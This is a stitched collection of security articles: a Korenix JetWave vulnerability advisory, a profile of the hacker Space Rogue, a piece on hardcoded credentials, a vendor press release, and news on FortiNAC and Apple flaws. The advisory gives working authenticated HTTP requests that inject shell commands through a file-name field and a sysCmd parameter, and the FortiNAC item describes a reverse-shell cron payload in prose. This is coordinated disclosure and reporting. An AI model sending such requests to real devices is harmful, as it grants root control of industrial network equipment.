Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.

**Title**: Multiple Vulnerabilities  
**Product**: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3  
**Vulnerable version**: See “Vulnerable Versions”  
**Fixed version**: See “Solution”  
**CVE**: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296  
**Impact**: High  
**Homepage**: https://korenix.com  
**Found**: 2022-11-28

_Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities._

**Vendor description**

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
\[…\]  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:  
https://www.korenix.com/en/about/index.aspx?kind=3

**Vulnerable versions**

The following firmware versions have been found to be vulnerable by CyberDanube:

*   Korenix JetWave4221 HP-E <= V1.3.0
*   Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

*   Korenix JetWave 2212G V1.3.T
*   Korenix JetWave 2212X/2112S V1.3.0
*   Korenix JetWave 2211C < V1.6
*   Korenix JetWave 2411/2111 < V1.5
*   Korenix JetWave 2411L/2111L < V1.6
*   Korenix JetWave 2414/2114 < V1.4
*   Korenix JetWave 2424 < V1.3
*   Korenix JetWave 2460 < V1.6

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)  
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

**Proof of Concept****1) Authenticated Command Injection**

1.a) – CVE-2023-23294  
The command “touch /tmp/poc” was injected to the system by using the following  
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/mgmtsaveconf.asp  
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45  
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip\_address=192.168.1.1&file\_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp\_action=load&tftp\_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295  
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1  
Host: 172.16.0.38  
Content-Type: application/x-www-form-urlencoded  
Connection: close  
Referer: 172.16.0.38  
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb  
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

**2) Authenticated Denial of Web-Service (CVE-2023-23296)**

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/toolping.asp  
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356  
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /  
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary  
Usage: rm \[OPTION\]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to  
indicate that all following arguments are non-options.

Options:  
\-i always prompt before removing each destination  
\-f remove existing destinations, never prompt  
\-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed  
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Owner of these products are suggested to update to the following versions:

*   Korenix JetWave 4221 HP-E V1.4.0
*   Korenix JetWave 2212G V1.10
*   Korenix JetWave 2212X/2112S V1.11
*   Korenix JetWave 2211C V1.6
*   Korenix JetWave 2411/2111 V1.5
*   Korenix JetWave 2411L/2111L V1.6
*   Korenix JetWave 2414/2114 V1.4
*   Korenix JetWave 2424 V1.3
*   Korenix JetWave 2460 V1.6
*   Korenix JetWave 3220/3420 V3 V1.7

**Workaround****Recommendation**

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

**Contact Timeline**

*   2022-12-05: Contacting Beijer Electronics Group via
*   2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
*   2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that  
    not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other  
    products have been patched.
*   2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
*   2023-02-13: Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

CVE-2023-23296: [EN] Multiple Vulnerabilities in Korenix JetWave Series - CyberDanube

Security Pro File: The old-school hacker traces a path from young hardware tinkerer to senior cybersecurity executive.

Before he was Space Rogue, before L0pht, before testifying in front of Congress about what used to be a very unknown risk of networked computers, and before he embarked on a career in cybersecurity, he was just young Cris Thomas with a homemade flashlight.

Growing up in a mobile home in rural Maine in the 1970s, Thomas didn't have a whole lot of access to technology in his early years. But at the tender age of five, armed with a hammer and a worn-out sealed alkaline flashlight — the kind that you threw away after the batteries lost their juice — he was able to first learn the basics of electrical circuits. Cannibalizing parts from those flashlights and adding C and D cell batteries and wires consisting of garbage bag twist ties, he was in business with his very own lighting device.

That kind of tinkering is the very essence of a hacker's modus operandi, and it was the start of his love affair with hacking and his eventual profession as a cybersecurity leader. Over the years, Thomas has done stints at the likes of Trustwave Security, Tenable, and almost six years now at IBM as Global Lead of Policy and Special Initiatives. But at its root his beginnings have all the same flavor of self-directed experimentation and trial-and-error with his flashlight. His route was circuitous and full of ups and downs, but he says that in some ways it was easier for him to go down that path than those trying to get their break in cybersecurity today without the traditional path straight from college.

"There's still people who are trying to break into the industry with little to no formal education, and the debate of college or certifications is still raging. So, I think getting into the industry, from an austere beginning and maybe even skipping the formal education and being self-taught — it is possible," he says. "It's a lot more difficult today, because I think people put a lot of importance on the college degree and the formal education, and so it's hard to get around that stigma."

After early grade school he moved to a bigger town, was exposed to computers in bits and pieces, and mastered the basics of BASIC from chance encounters, clubs, and high school computer class. But it wasn't until he was in the Army that he was able to buy his very own computer, a Mac SE he bought on credit from a store nearby his base. It was from this machine he dug further into programming and got synced up with his first local user group, a Mac HyperCard user group. From there he branched out into BBSs and began to tap into the burgeoning Internet hacker subculture. After the Army and a brief stint at Boston University, he took the handle Space Rogue, dialing into the Boston BBSs. Many of those had a whole underground world of in-person meet-ups attached to them. Running in those circles — plus holding down a job at a local CompUSA where a number of local hackers worked — is what would eventually lead Space Rogue to the ragtag group of hackers called L0pht.

**Remembering the L0pht**

A collective of elite hackers and a hackerspace rolled into one, the L0pht is one of those storied groups that's inextricably tied in with the infancy of the cybersecurity industry. In a book published this month, _Space Rogue: How the Hackers Known as L0pht Changed the World_, Thomas writes the memoir of his winding journey to hacking and his membership in the group.

Space Rogue was one of the earliest members and was heavily involved in the group's adventures and hacking experimentation. He was there for its evolution into what would become L0pht Heavy Industries, its release of the L0phtCrack password-cracking tool, and its eventual sale to @Stake. Together with hackers like Mudge, Weld Pond, Kingpin, Dildog, tan, and Stefan von Neumann, they were on the bleeding edge of experimentation with hardware and software — partially from scavenging corporate dumpsters for equipment, partially from soliciting donations and picking up cool finds at the MIT Flea Market, where they also sold refurbished gear to partially fund their loft space. The crew ran their own NOC, experimenting with different forms of networking, and they shared files online through the early version of the L0pht.com server. Space Rogue ran the popular Whacked Mac Archives, a collection of software collected from underground systems and BBSs over the years. He did the books and paid the bills as an unofficial chief operating officer and was also instrumental in helping raise the profile of the group by founding and running Hacker News Network and helping to coordinate a lot of its work with the media.

The work the L0pht did for a very long time was simply a labor of love — the hackers had day jobs. In their off-hours time of experimentation they started learning how truly vulnerable systems are to manipulation and exploitation in ways unexpected by their creators. As the team evolved, they started picking up gigs writing custom signatures for the first incarnations of intrusion detection systems, issued advisories about vulnerabilities on their website and Bugtraq, and were courted by firms to do pen testing. For a long time they barely broke even, but their security chops did gain the attention of the federal government, and in 1998 Space Rogue and six other core members of the L0pht stepped in front of a Congressional panel to give one of the earliest public warnings about the state of insecurity of the online world.

Thomas does a great job detailing all of these happenings in his book, which offers a very personal and open account of his perspective on how things unfolded. He does a great job highlighting the personalities and mindsets of the different hackers he worked with or came across over the years, and is very relatable and vulnerable offering thoughts on his maturing perspectives on dealing with not just systems but also people. Readers get to follow along with his close connections with hacker friends, fallouts and reconciliations, and run-ins with difficult bosses, as well as career disillusionment and rebirth.

**What's in a Handle?**

Musing about the L0pht and his book recently, he notes that while his unconventional learnings and rise through cybersecurity could probably be emulated by newcomers, the rise of L0pht itself occurred during a very unique era in time and would be a whole heck of a lot more difficult to recreate.

"I mean, you can get a bunch of people together and rent some space and do some stuff, but getting the same attention would be harder because the bugs are harder to find now," he says. He explains that what L0pht did wasn't easy, but they found the low-hanging fruit in security flaws.

They also had a lot less red tape and legal and professional standards to navigate. Doing what they did back in the 1990s today would put most cybersecurity researchers in a lot of hot water.

"There's a lot more risk involved. I mean, there was risk then too, but if you're going to release information about a zero-day vulnerability to the public without a pseudonym, the risk of lawsuits is pretty high. Which is, again, one of the reasons why we were using the handles and the pseudonyms to begin with. But staying pseudonymous is a lot more difficult today than it was."

Thomas still cherishes and uses his Space Rogue handle — it's part of his online and professional persona. For example, his email address at IBM is based on that handle rather than his real name.

"I built a reputation as Space Rogue within the industry. I was the last member of the L0pht to actually start using their given name in professional settings," he says. "So it's only been a few years for me, really, that people have looked at the handle and been able to equate it to the given name easily."

These days, Mudge is known as Peiter Zatko, who worked at DARPA and Google in key roles, and most recently in the news as the Twitter whistleblower who drew attention to the social network's lacking security stance. Weld Pond is Chris Wysopal, who co-founded Veracode. Kingpin is Joe Grand, a well-known security researcher and author who runs Grand Idea Studio. But when they see each other, they'll always be Mudge, Weld, and Kingpin to him.

"And for the most part, people still address me as Space Rogue or SR. At work, people call me Space, and occasionally I'll get Mr. Rogue, but that's usually as a joke," he says. "My wife actually referred herself in a Twitter thread the other day as Mrs. Space Rogue."

**Looking Back at Industry Change**

All kidding aside about handles, Space Rogue is still as much of a concerned industry watcher as those days back at the L0pht, stepping in front of federal lawmakers.

"I've always been interested in policy and how legal ramifications are impacting the online world. Right now, I'm following a lot of actions of CISA, and I have to say that as a nation we're actually doing a great job," he says. "In the past, government has been behind schedule and playing catch-up, but I think CISA's actually taken a very good, proactive approach, which is a welcome change in the industry."

At the same time, though, he says that there's this dichotomy in cybersecurity where over the last 25 years, everything has changed but is also still the same. There's a ton more awareness now, not just from policy makers or industry insiders but just individual workers or non-tech business executives, about things like ransomware or phishing.

"Most people have to go through some sort of security training in their job, so the awareness factor is much higher," he says.

At the same time, though, the cybersecurity world is still knocking its head against the same problems it did decades ago.

"We're making stupid mistakes. We're using default passwords. We're designing flat networks. And these are the same problems that we had 25 years ago," he says. "So, it's a little bit of some and a little less of some other stuff. A lot of things have changed and gotten better, but a lot of things have still stayed the same as well."

**PERSONALITY BYTES**

**What he does for fun:** A lot of treasured hobbies mirror his hacking interests — his fun project at the moment is setting up a Raspberry Pi for his son to help him learn Python and picoCTF. "You can't get Raspberry Pis at the moment, so I've had to cannibalize some of my old projects to get him one that he can use."

**Non-hacking hobbies:** There was a time he was into making hard cider, but he moved and had less room for all of the equipment. Now he's turned his sights to rock tumbling. "My youngest got a rock tumbler last year and never used or was very interested in it. And I was like 'Well, if you're not going to use it, I'm going to.' Now I have four tumblers and I'm rotating rocks in the basement all the time."

**Quirky tidbits:** He says he's kind of an open book, and shares a lot of fun stuff with co-workers via Slack, so there's nothing they'd be surprised to know about him. But like many folks in the industry, he's got his quirky interests. "I'm a big Saturn car aficionado."

**Favorite day-to-day drink:** "I drink a lot of caffeine-free Diet Coke."

**How he tells people what he does for a living:** Per his book, he wrote, "I rarely blurt out 'Hi, I’m a hacker' when I first meet people. Trying to explain to people what I do for work can sometimes be tricky and lead into all sorts of long and sticky conversations, so I usually just say I work in computers."

Cris Thomas: Space Rogue, From L0pht Hacker to IBM Security Influencer

The (Other) Risk in Finance
A few years ago, a Washington-based real estate developer received a document link from First American – a financial services company in the real estate industry – relating to a deal he was working on. Everything about the document was perfectly fine and normal.
The odd part, he told a reporter, was that if he changed a single digit in the URL, suddenly, he could see

****The (Other) Risk in Finance****

A few years ago, a Washington-based real estate developer received a document link from First American – a financial services company in the real estate industry – relating to a deal he was working on. Everything about the document was perfectly fine and normal.

The odd part, he told a reporter, was that if he changed a single digit in the URL, suddenly, he could see somebody else's document. Change it again, a different document. With no technical tools or expertise, the developer could retrieve FirstAm records dating back to 2003 – 885 _million_ in total, many containing the kinds of sensitive data disclosed in real estate dealings, like bank details, social security numbers, and of course, names and addresses.

That nearly a billion records could leak from so simple a web vulnerability seemed shocking. Yet even more severe consequences befall financial services companies every week. Verizon, in its most recent Data Breach Investigations Report, revealed that finance is the single most targeted industry worldwide when it comes to basic web application attacks. And according to Statista, successful breaches cost these companies an average of around six million dollars apiece. The IMF has estimated that industry-wide losses from cyberattacks "could reach a few hundred billion dollars a year, eroding bank profits and potentially threatening financial stability."

In response, executives are allocating millions more every year to sophisticated defense systems – XDR, SOCs, AI tools, and more. But while companies fortify against APTs and mature cybercriminal operations, security holes as _rudimentary_ as FirstAm's remain rampant across the industry.

There's one category of vulnerability, in particular, that rarely comes up in boardroom discussions. Once you start looking, though, you'll find it nearly everywhere. And far more than zero-days, deep fakes or spear phishing, it's quite easy for hackers to discover this kind of error, and pounce on it.

****A Vulnerability Everybody's Overlooking****

Image created with Midjourney

In 2019, three researchers from North Carolina State University tested a hypothesis commonly understood but not often discussed in cybersecurity.

Github and other source code repositories, the story goes, have caused a boom for the software industry. They allow talented developers to collaborate around the world by donating, taking and combining code into newer, better software, built faster than ever before. To enable the different code to get along, they use credentials – secret keys, tokens and so on. These connecting joints allow any bit of software to open its door to another. To prevent attackers from getting through the same way, they're protected behind a veil of security.

Or are they?

Between October 31, 2017 and April 20, 2018, the NCSU researchers analyzed over two billion files from over four million Github repositories, representing around 13 percent of everything on the site. Contained in those samples were nearly 600,000 API and cryptographic keys – secrets, embedded right in the source code, for anybody to see. Over 200,000 of those keys were unique, and they were spread across more than 100,000 repos in all.

Though the study accumulated data over six months, a few days – even a few hours – would have sufficed to make the point. The researchers highlighted how thousands of new secrets leaked during every day of their study.

Recent research has not only supported their data, it's taken it a step further. For example, in the 2021 calendar year alone, GitGuardian identified over six _million_ secrets published to Github – about three per every 1,000 commits.

At this point, one might wonder whether secret credentials contained ("hardcoded") in source code are really so bad if they're so common. Safety in numbers, right?

****The Danger of Hardcoded Credentials****

Hardcoded credentials seem like a theoretical vulnerability until they make their way into a live application.

Last Fall, Symantec identified nearly 2,000 mobile apps exposing secrets. Over three-quarters leaked AWS tokens, enabling outside parties to access private cloud services, and nearly half leaked tokens that further enabled "full access to numerous, often millions, of private files."

To be clear, these were legitimate, public applications used around the world today. Like the five banking apps Symantec found all using the same third-party SDK for digital identity authentication. Identification data is some of the most sensitive information apps possess, but this SDK leaked cloud credentials that "could expose private authentication data and keys belonging to every banking and financial app using the SDK." It didn't end there, since "users' biometric digital fingerprints used for authentication, along with users' personal data (names, dates of birth, etc.), were exposed in the cloud." In all, the five banking apps leaked over 300,000 of their users' biometric fingerprints.

If these banks have escaped compromise, they're lucky. Similar leaks have taken out even bigger fish before.

Like Uber. You'd imagine that only highly organized and talented cyber adversaries could breach a technology company of Uber's standing. In 2022, however, a 17 year-old managed to do it all on his own. After some light social engineering led him into the company's internal network, he located a Powershell script containing admin-level credentials for Uber's privileged access management system. That's all he needed to then compromise all sorts of downstream tools and services used by the company, from their AWS to their Google Drive, Slack, employee dashboards, and code repos.

This might have been a more remarkable story, had it not been for the _other_ time Uber lost secrets to hackers in a 2016 private repo breach that exposed data belonging to over 50 million customers and seven million drivers. Or the _other_ time they did it, through a public repo, in 2014, revealing the personal information of 100,000 drivers along the way.

****What to Do****

Finance is the single most targeted sector for cyberattackers worldwide. And every researcher who drudges up thousands of vulnerable apps, or millions of vulnerable repos, demonstrates just how simple it would be for attackers to identify hard-coded credentials in the code essential to running any modern company in this industry.

But just as easily as the bad guys could do it, so too could the good. Both AWS and Github themselves attempt, as best they can, to monitor for leaky credentials on their platforms. Clearly, those efforts aren't enough on their own, which is where a cybersecurity vendor steps in.

Learn more about monitoring source code for secrets from one of our experts

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Secret Vulnerability Finance Execs are Missing

**BLOOMFIELD, N.J., Feb. 21, 2023 (GLOBE NEWSWIRE) --** Xcitium, a security platform provider focused on preventing damage caused by Malware, today announced availability of its advanced endpoint security solution, ZeroDwell Containment, for customers with or without legacy EDR products.

Xcitium multi-patented technology closes the gaps in enterprise cybersecurity defenses left by traditional detection methods.

According to Tim Bandos, EVP of SOC services at Xcitium: “However sophisticated your security stack, there will always be new threats that slip through the cracks. With an estimated 560,000 new pieces of malware created every day, legacy EDR vendors will fail to detect anywhere between 1% and 5% of Unknown hostile payloads that cause immense damage.”

ZeroDwell Containment is the only solution in the marketplace that assures zero dwell time for cyber-attacks, and the only solution capable of preventing unknown threats without compromising productivity.

Dwell time is the amount of time it takes to detect an initial infection by an attacker from the moment it enters the system. As dwell time increases, so do the chances of damage, disruption or theft from malware, phishing, ransomware and other forms of cyber-attack. The mean average dwell times in the industry are well documented at ~21 days.

Xcitium’s ZeroDwell Containment isolates all unknown or suspect code entering an organization until it can be verified as trustworthy: all unknown objects are guilty until proven innocent. Unlike rival solutions, end users, applications, data, and business operations are never interrupted by ZeroDwell Containment, and contained attacks are no longer threats.

Ken Levine, Chief Executive of Xcitium: “No system that relies on detection alone can ensure all malware will be found and eliminated before it causes damage. Traditional detection is unable to detect unknown objects, and this is why breaches and ransoms persist worldwide! Xcitium, however, contains all unknown objects that have no known signature or hash, preventing attacker damage. This protection-first approach closes the cyber security gap. Organizations that run Zero Dwell Containment either with our full endpoint or alongside their existing solutions are more secure. To prove the point, Xcitium publishes weekly statistics.” 

Xcitium recently won a multi-year contract with Positivo Tecnologia, one of the leading provider of computers, cell phones, tablets, accessories, servers, educational technologies, smart homes devices, and mobile payment terminal in the Brazilian market.

Julio Guapo, CIO of Positivo Tecnologia, said: “We selected Xcitium as the cybersecurity solution to protect our internal company environment and users. During the POC process, the Positivo Tecnologia IT Security team put Xcitium through its paces, testing and repeatedly challenging its ZeroDwell Containment technology. Xcitium isolated the attacker’s execution path every single test period, so the threat was prevented from harming any endpoint.”

Nandor Feher, Positivo Tecnologia’s CISO further commented, “Xcitium’s ZeroDwell Containment offered to Positivo Tecnologia a compelling differentiation with patented breach prevention technology helping the Brazilian tech company to compose the corporate zero thrust architecture, as well as becoming one of the most important layers to neutralize and protect against ransomware, malware, and cyber-attacks. This is now one of the top tools in our department. It is enabling Positivo Tecnologia to face the cybersecurity challenges of modern attacks. It also helps us to fill so many of the roles of other tools. By consolidating, simplifying and being more efficient in our security operations and the ability to do all of that in one system, it proves its value every day.”

Frost & Sullivan named Xcitium as the 2022 Competitive Strategy Leader of the Endpoint Security industry. Sarah Pavlak, industry principal with Frost & Sullivan noted: “Xcitium’s ZeroDwell technology, utilizing patented kernel-level API virtualization, prevents unknown malware from accessing critical system resources that cause damage, while providing complete use of the unknown file or application—this is a distinct departure from all existing vendors that terminate the offending unknown only after their engine makes a threat determination.”

Xcitium was also named Product of the Year 2022 earlier this month by AV Labs, an independent malware test lab based in the European Union.

For additional details, please visit Xcitum.com.

**About Xcitium**

Xcitium, formerly known as Comodo Security Solutions, is used by more than 5,000 organizational customers and partners around the globe. Xcitium was founded with one simple goal – to put an end to cyber breaches. Our patented ZeroDwell technology uses CPU-Virtualization to isolate and remove threats like zero-day malware and ransomware before they cause any damage. ZeroDwell is the cornerstone of Xcitium’s endpoint suite, which includes preemptive endpoint containment, endpoint detection & response (EDR), managed detection & response (MDR), and extended managed detection & response (XDR). Since its inception, Xcitium has a track record of zero breaches when fully configured.

Xcitium Brings 'Zero Dwell' Capability to Legacy EDR Platforms

Organizations are urged to update to the latest versions of FortiNAC to patch a flaw that allows unauthenticated attackers to write arbitrary files on the system.

Researchers have released details for how to exploit a critical remote code execution (RCE) bug in Fortinet's FortiNAC product, which allows an unauthenticated attacker to write arbitrary files on the system and achieve RCE as a root user.

Organizations use FortiNAC as a network access control solution to oversee and secure all digital assets connected to the enterprise network. The product can be used to manage a range of devices, including: corporate endpoints, Internet of Things (IoT), operational technology and industrial control systems (OT/ICS), and connected medical devices (IoMT), among others. The idea is to provide visibility, control, and automated response for everything that connects to the network, and as such, the device offers a golden opportunity for attackers to pivot and move deep into networks, enumerate environments, steal sensitive information, and more.

Researchers at Horizon3.ai released a blog post with a technical analysis of and proof of concept (POC) exploit for the vulnerability, tracked as CVE-2022-39952, and revealed and patched by Fortinet last week. They subsequently released the exploit code on GitHub.

Fortinet's Gwendal Guégniaud discovered the vulnerability, which earned a critical rating of 9.8 on the CVSS vulnerability-severity scale. The bug allows attackers to take external control of a file name or path vulnerability in the FortiNAC Web server, Fortinet said in its advisory, thus allowing unauthenticated arbitrary writes on the system.

Fortinet has patched in its affected product versions, with customers urged to update to FortiNAC version 9.4.1 or above, FortiNAC version 9.2.6 or above, FortiNAC version 9.1.8, or FortiNAC version 7.2.0 or above.

**How to Exploit the Fortinet FortiNAC Flaw**

While there are several ways for attackers to obtain RCE by exploiting arbitrary file write flaws, the researchers wrote what's called a "cron job to /etc/cron.d/" to take advantage of the vulnerability, they said.

The researchers extracted filesystems from both the vulnerable and patched versions of the product to examine the flaw, finding that Fortinet removed an offending file called /bsc/campusMgr/ui/ROOT/configWizard/keyUpload.jsp in the update that patches the bug. It turns out that file allowed an unauthenticated endpoint to parse requests that supply a file in the key parameter and then write it to /bsc/campusMgr/config.applianceKey, the researchers said.

To exploit this flaw, researchers successfully wrote the file and made a call that executes a bash script, which in turn can unzip the file that was just written. The unzip process "will allow placing files in any paths as long as they do not traverse above the current working directory," Horizon3.ai's chief attack engineer Zach Hanley wrote in the blog post. "Because the working directory is /, the call unzip inside the bash script allows any arbitrary file to be written."

"Immediately, seeing this call on the attacker-controlled file gave us flashbacks to a few recent vulnerabilities we’ve looked at that have abused archive unpacking," he added.

Researchers used the aforementioned cron job — which entails using the code /etc/cron.d/payload — to weaponize the flaw. The job gets triggered every minute and initiates a reverse shell to the attacker. To do this, researchers created a zip archive that contains a file and specifies the path for extraction, and then sent the malicious zip file to the vulnerable endpoint in the key field, they said.

"Within a minute, we get a reverse shell as the root user," which then can allow for remote code to be executed, Hanley wrote.

**History of Attacker Interest**

Historically, attackers have had a tendency to pounce on Fortinet flaws — sometimes even before the company knows they exist. Since they offer a prime opportunity to gain a foothold on enterprise networks, it would be prudent for any organizations running affected versions of FortiNAC to update to the patched products ASAP. So far, neither Fortinet nor Horizon3.ai are aware of any instances of attackers taking advantage of the flaw, but now that the latter's proof of concept is released, with step-by-step details on how it can be exploited, this is likely to change. 

As recently as January, the researchers tied a sophisticated new backdoor dubbed BoldMove to a zero-day vulnerability that Fortinet discovered in multiple versions of its FortiOS and FortiProxy technologies in December. The flaw allowed an unauthenticated attacker to execute arbitrary code on affected systems. In the zero-day attack, a China-based threat actor engaged in cyber-espionage operations apparently had written the malware to run specifically on Fortinet's FortiGate firewalls even before the vulnerability was made public and patched, the researchers discovered.

In October, attackers also showed significant interest in a critical authentication bypass vulnerability in multiple versions of Fortinet's FortiOS, FortiProxy, and FortiSwitchManager technologies, particularly after exploit code for the flaw was released.

Exploit Code Released for Critical Fortinet RCE Bug

By Deeba Ahmed
The bugs allowed cybercriminals to bypass the iOS system's security protections and execute unauthorized code. 
This is a post from HackRead.com Read the original post: Apple Bug Could Allow Attackers Access to Photos and Messages

The findings are based on previous research from Google and Citizen Lab conducted in 2021 which discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to the Israeli NSO Group.

Apple devices and products are known for their advanced security mechanisms, particularly the iPhone and Macbook. However, the latest research reveals that even Apple products aren’t safe from the prying eyes of threat actors.

Researchers at the cybersecurity firm Trellix Advanced Research Center have disclosed details of a newly discovered privilege escalation bug class that, if exploited, could allow an attacker to sweep up call history, messages, and photos from the device.

According to researchers, the bugs allowed cybercriminals to bypass the iOS system’s security protections and execute unauthorized code. The security flaws were ranked as medium to high in terms of security.

Trellix’s vulnerability research director, Doug McKee, stated that although Apple has addressed the issue, the concern is that these vulnerabilities allow bypassing of Apple’s security model at a “fundamental level.”

Apple said the bugs weren’t exploited in the wild before being fixed.

**How Was the Bug Discovered?**

The findings are based on previous research from Google and Citizen Lab conducted in 2021. The organizations discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to NSO Group.

This was a highly sophisticated exploit found on a Saudi activist’s iPhone and was used for installing Pegasus malware developed by the NSO Group. The same spyware was also found on the iPhones of nine State Department officials in the United States.

This exploit had two key features: first, it tricked the iPhone into opening a malicious PDF disguised as a GIF file. Secondly, it enabled attackers to evade the sandbox that Apple introduced to prevent apps from accessing data from other apps or other parts of the device.

This second feature of ForcedEntry was the basis of Trellix’s research from senior vulnerability researcher Austin Emmitt. A proof-of-concept was released to demonstrate how the bugs could be exploited.

**Vulnerabilities**

Emmitt discovered a new class of vulnerabilities revolving around the NSPredicate tool that filters code within Apple’s systems. This tool was first exploited in ForcedEntry, as the 2021 research revealed, and Apple introduced new measures to prevent this abuse.

However, the mitigation methods were insufficient, as Trellix researchers found that these methods could also be bypassed since bugs in the NSPredicate class were found in multiple places in macOS and iOS systems.

This includes the Springboard app, which manages the home screen on an iPhone and can access photos, location data, and the camera. After exploiting the bugs, the attacker could access places they could not otherwise invade. Attackers trying to exploit it need to gain an initial foothold into the device.

Vulnerabilities in NSPredicate were discovered in macOS 13.2 and iOS 16.3, and Apple patched them with software updates in January. The company also issued CVEs for these flaws—CVE-2023-23530 and CVE-2023-23531—and released new versions of macOS and iOS.

1.  Apple AirTags used as trojan for credential hacking
2.  iOS Devices Receive Vital Security Updates from Apple
3.  Charging cable remotely steals data from Apple devices
4.  55 Apple bugs risked iCloud account takeover, data theft
5.  Study: Android sends more data to Google than iOS to Apple

Apple Bug Could Allow Attackers Access to Photos and Messages

Security researchers found a class of flaws that, if exploited, would allow an attacker to access people’s messages, photos, and call history.

For years, Apple has hardened the security systems on iPhones and Macs. But no company is immune from such issues. Research reveals a new class of bugs that can affect Apple’s iPhone and Mac operating systems and if exploited could allow an attacker to sweep up your messages, photos, and call history.

Researchers from security firm Trellix’s Advanced Research Center are today publishing details of a bug that could allow criminal hackers to break out of Apple’s security protections and run their own unauthorized code. The team says the security flaws they found—which they rank as medium to high severity—bypass protections Apple had put in place to protect users.

“The key thing here is the vulnerabilities break Apple’s security model at a fundamental level,” says Doug McKee, director of vulnerability research at Trellix. McKee says that finding the new bug class means researchers and Apple will potentially be able to find more similar bugs and improve overall security protections. Apple has fixed the bugs the company found, and there is no evidence they were exploited.

Trellix’s findings build on previous work by Google and Citizen Lab, a University of Toronto research facility. In 2021, the two organizations discovered ForcedEntry, a zero-click, zero-day iOS exploit that was linked to Israeli spyware maker NSO Group. (The exploit, described as highly sophisticated, was found on the iPhone of a Saudi activist and used to install NSO’s Pegasus malware.)

